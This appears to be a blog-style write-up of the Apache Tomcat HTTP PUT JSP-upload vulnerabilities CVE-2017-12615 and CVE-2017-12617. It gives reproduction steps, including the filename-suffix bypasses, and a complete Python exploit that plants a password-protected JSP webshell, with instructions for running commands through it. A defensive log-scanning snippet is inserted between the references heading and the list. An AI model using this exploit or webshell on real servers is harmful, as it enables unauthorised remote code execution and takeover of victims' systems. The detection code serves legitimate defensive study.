Apache Tomcat Remote Code Execution Vulnerability

There are two main remote code execution vulnerabilities here:

CVE-2017-12615
CVE-2017-12617

These are quite old vulnerabilities; digging them up again to summarize :)

With a specially crafted request, an attacker can upload a malicious JSP file to the user's server, and through that uploaded JSP file execute arbitrary code on the server.

The official definition reads:

CVE-2017-12615: When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Vulnerable environment:

Apache Tomcat 7.0.0-7.0.79

Windows

readonly = false

Reproduction:

First, in web.xml, set the readonly parameter to false. By default the readonly parameter may not be present, so add it yourself.

The readonly parameter controls whether PUT and DELETE requests are rejected; false means they are allowed.

Save the configuration, then visit the site (pay attention to the configured port number).

Use an OPTIONS request to obtain the request methods the target site supports; PUT is allowed.

Capture the request in BurpSuite, change the GET request to a PUT request, and write the code into test.jsp.

The server returns 404. Because of Windows characteristics (NTFS file streams and filename restrictions: a Windows filename cannot end with a space), this restriction can be bypassed.

Append %20 or ::$DATA to bypass it.

You can see that two JSP files have been uploaded successfully to the directory.

They can be accessed normally and return output, so a full webshell can be uploaded into the JSP file.

The later CVE-2017-12617 is very similar to CVE-2017-12615; the affected Tomcat versions differ, but the exploitation method is the same.

CVE-2017-12617:When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Writing an automated test and exploitation script

The main idea is to test whether the OPTIONS response reports PUT support, then upload the webshell.

This draws on other people's Python scripts; Metasploit has also integrated support for this vulnerability.

# -*- coding: utf-8 -*-
# Python 2 script (httplib and the print statement). Usage: python script.py host:port
import httplib
import sys
import time
# JSP body written to the server: runs the "cmd" parameter when "pwd" matches
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
try:
    conn = httplib.HTTPConnection(sys.argv[1])
    # Ask which methods the server allows; PUT must appear in the Allow header
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = dict(conn.getresponse().getheaders())
    if 'allow' in headers and 'PUT' in headers['allow']:
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        # The trailing "/" makes the default servlet store the file as a plain .jsp
        url = "/" + str(int(time.time())) + '.jsp/'
        # Alternative on Windows/NTFS: the ::$DATA stream suffix
        #url = "/" + str(int(time.time())) + '.jsp::$DATA'
        conn.request(method='PUT', url=url, body=body)
        res = conn.getresponse()
        if res.status == 201:    # 201 Created: the file was written
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
        elif res.status == 204:  # 204 No Content: the file already existed
            print 'file exists'
        else:
            print 'error'
        conn.close()
    else:
        print 'Server not vulnerable'

except Exception, e:
    print 'Error:', e

Run the test; when the target site is vulnerable, the shell file is created automatically and the path of the JSP webshell is printed.

Access the webshell, passing the parameters pwd=[password]&cmd=[command].

References:
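As an added defender-side example (not from the original post or the referenced scripts), the following Python 3 snippet scans Tomcat access-log lines in the default common pattern for PUT requests that target JSP files using the suffix tricks described above (trailing "/", "::$DATA", trailing space sent as %20); the log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Tomcat's default "common" AccessLogValve pattern
# (%h %l %u %t "%r" %s %b), mirroring the upload and webshell traffic described above.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Sep/2017:10:12:30 +0800] "OPTIONS /ffffzz HTTP/1.1" 200 -
10.0.0.5 - - [20/Sep/2017:10:12:33 +0800] "PUT /1505873553.jsp/ HTTP/1.1" 201 -
10.0.0.5 - - [20/Sep/2017:10:12:40 +0800] "PUT /test.jsp::$DATA HTTP/1.1" 201 -
10.0.0.5 - - [20/Sep/2017:10:12:45 +0800] "PUT /test.jsp%20 HTTP/1.1" 201 -
10.0.0.5 - - [20/Sep/2017:10:13:01 +0800] "GET /test.jsp?pwd=023&cmd=whoami HTTP/1.1" 200 512
10.0.0.7 - - [20/Sep/2017:10:14:00 +0800] "PUT /upload/report.txt HTTP/1.1" 201 -
10.0.0.9 - - [20/Sep/2017:10:15:00 +0800] "GET /index.jsp HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Suffix tricks from the post: trailing "/", NTFS "::$DATA" stream, trailing
# space (sent as %20). Each makes the default servlet store the file as plain .jsp.
BYPASS_RE = re.compile(r'\.jspx?(/|::\$DATA|\s)$', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['path'] = unquote(rec['path'].split('?', 1)[0])  # drop query, decode %20
    rec['status'] = int(rec['status'])
    return rec


def find_jsp_put_attempts(log_text):
    """Flag PUTs aimed at a JSP; 'created' is True when Tomcat answered 201."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec['method'] != 'PUT':
            continue
        path = rec['path']
        bypass = BYPASS_RE.search(path) is not None
        if bypass or path.lower().endswith(('.jsp', '.jspx')):
            hits.append({'ip': rec['ip'], 'path': path, 'bypass': bypass,
                         'created': rec['status'] == 201})
    return hits
```

A 201 on such a path is the strongest signal, but a PUT to any .jsp, even one that failed, is worth alerting on because it means PUT is reachable and being probed.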

  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12615
  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617
  3. https://paper.seebug.org/398/
  4. https://blog.csdn.net/qq1124794084/article/details/78044756
  5. https://www.freebuf.com/vuls/150203.html
  6. https://www.exploit-db.com/exploits/43008
